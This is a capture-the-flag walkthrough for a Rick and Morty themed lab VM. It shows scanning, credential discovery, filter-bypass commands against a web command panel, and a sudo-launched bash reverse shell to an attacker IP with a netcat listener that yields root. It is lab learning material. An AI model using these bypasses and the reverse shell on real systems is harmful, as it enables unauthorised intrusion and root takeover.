Pickle Rick

A Rick and Morty themed VM with a web server.

This room can be found HERE.

Nmap

First, we launch an nmap scan of all TCP ports with version detection and default scripts.

nmap -sV -sC -p- $IP --min-rate=5000
nmap results
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ca:b4:fb:d9:51:93:12:59:8b:a8:6f:8a:80:47:57:77 (RSA)
|   256 b6:ac:c4:48:03:69:78:3b:c0:19:96:4f:11:6e:e6:88 (ECDSA)
|_  256 e3:3b:1b:8e:a6:ac:f5:ac:19:cb:bc:e5:16:4f:82:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that ports 22 (SSH) and 80 (HTTP) are open. Let's check out port 80 first.

Checking out the website

home page

This seems to be the home page, so let's check the page source. Sure enough, there is something interesting in there: a username.

source of the home page

Enumeration

Since this is a web server, let's enumerate its directories and files. I'll use dirsearch for this, but gobuster works just as well.

dirsearch -u http://$IP
dirsearch results
...
200   588B   http://10.10.72.200/assets/
200   455B   http://10.10.72.200/login.php
200    17B   http://10.10.72.200/robots.txt
...

Login

We have a login page, but let's look at robots.txt first. The file contains only the text "Wubbalubbadubdub". That could be the password for the login page, so let's check it out now.

login page

Let's try the username we found in the home page source with the "Wubbalubbadubdub" string from robots.txt as the password.

Sure enough, we are in!

portal page once logged in

Trying out commands

It seems we have a command panel that executes whatever we type. Let's try a simple ls first.

result of the ls command

It seems we have our first flag! Let's cat it to read its contents.

result of the cat command

We can see that the cat command is disabled, but the panel is only blocking the command name, not the act of reading a file, so we can easily work around it with another utility that prints a file, such as less. First down, two to go. 🚩
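To show why blocking "cat" buys the panel nothing, here is an added example (my own, not code from the room or its portal) that simulates a word-blacklist filter and then reads a file with several commands that never contain the blocked word. The filter and its word list are assumptions modelled on what we observed (cat refused, less accepted); the real portal source is not on the page, and the flag file is a constructed sample so the script runs offline.

```shell
#!/bin/sh
# Added example (not the room's own code): a stand-in for the command panel's
# filter, and several ways to read a file once "cat" is rejected.
#
# ASSUMPTION: the panel refuses any command line containing a blacklisted word.
# The list below is made up for this demo; the page only shows cat failing.
BLOCKED_WORDS="cat head tail more"

# Simulated filter: return 1 (refuse) if any blocked word appears anywhere
# in the command string, 0 (allow) otherwise.
panel_filter() {
    cmd="$1"
    for word in $BLOCKED_WORDS; do
        case "$cmd" in
            *"$word"*) echo "Command disabled: $word" >&2; return 1 ;;
        esac
    done
    return 0
}

# Run a command the way the panel would: filter first, then hand the
# string to a shell. Output goes to stdout so callers can capture it.
panel_run() {
    panel_filter "$1" || return 1
    sh -c "$1"
}

# Constructed sample "flag" file so the script runs offline. The file name
# deliberately contains none of the blocked words.
FLAG_FILE="${TMPDIR:-/tmp}/pickle_rick_ingredient.txt"
setup_flag() {
    printf 'flag{constructed_sample_ingredient}\n' > "$FLAG_FILE"
}

# Baseline: the obvious command is refused by the filter.
read_with_cat()  { panel_run "cat '$1'"; }

# Bypasses: a substring blacklist on command names cannot stop other readers.
read_with_less() { panel_run "less '$1'"; }      # what the write-up used
read_with_sed()  { panel_run "sed -n p '$1'"; }  # print every line
read_with_loop() { panel_run "while IFS= read -r l; do printf '%s\n' \"\$l\"; done < '$1'"; }
read_with_glob() { panel_run "/bin/ca[t] '$1'"; } # the shell expands the glob to /bin/cat

# Stand-alone demo: write the sample file, show the refusal, then each bypass.
setup_flag
read_with_cat  "$FLAG_FILE" || echo "(cat refused, as on the portal)"
read_with_sed  "$FLAG_FILE"
read_with_loop "$FLAG_FILE"
read_with_glob "$FLAG_FILE"
```

The glob variant is worth remembering: the filter sees the literal text /bin/ca[t], but the shell that finally runs the command expands it to /bin/cat, so even the "blocked" binary itself is reachable. Blacklists on command strings are a speed bump, not a control.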

Let's try some other commands and see what we can do. First, let's find out who we are by running whoami.

result of the whoami command

Now let's see if we can do anything with sudo by running sudo -l.

result of the sudo -l command

Reverse shell

Okay! We can run anything with sudo, which means we can launch a reverse shell as root. Let's first write the reverse shell script and make it executable (see the Reverse Shell Cheat Sheet). I'll type these commands into the command panel; the file lands in the web root, /var/www/html, since that is the panel's working directory:

sudo echo "bash -i >& /dev/tcp/10.8.239.221/4444 0>&1" | sudo tee hello.sh
sudo chmod +x hello.sh

On my Kali machine I start a netcat listener with nc -nlvp 4444. Then we trigger the shell by typing sudo bash hello.sh into the command panel. (The sudo in front of echo does nothing useful, since only the tee that writes the file needs privileges, and because bash is invoked through sudo the chmod +x is not strictly needed either; the connection still comes back as root.)

reverse shell initiation
listening on [any] 4444 ...
connect to [10.8.239.221] from (UNKNOWN) [10.10.72.200] 57232
bash: cannot set terminal process group (1347): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-72-200:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

And so we have a root shell!

Finding the remaining flags

Now let's search for the remaining flags, starting with the /home directory.

root@ip-10-10-72-200:/home# ls
rick
ubuntu

Let's check Rick's home folder for anything interesting.

root@ip-10-10-72-200:/home# ls rick
second ingredients

Second flag done! 🚩

Something tells me the third flag is in the /root directory, which we can read now that we are root, so let's check it out.

root@ip-10-10-72-200:/home# cd /root
root@ip-10-10-72-200:~# ls
3rd.txt
snap

And there we go! We have all the flags 🚩
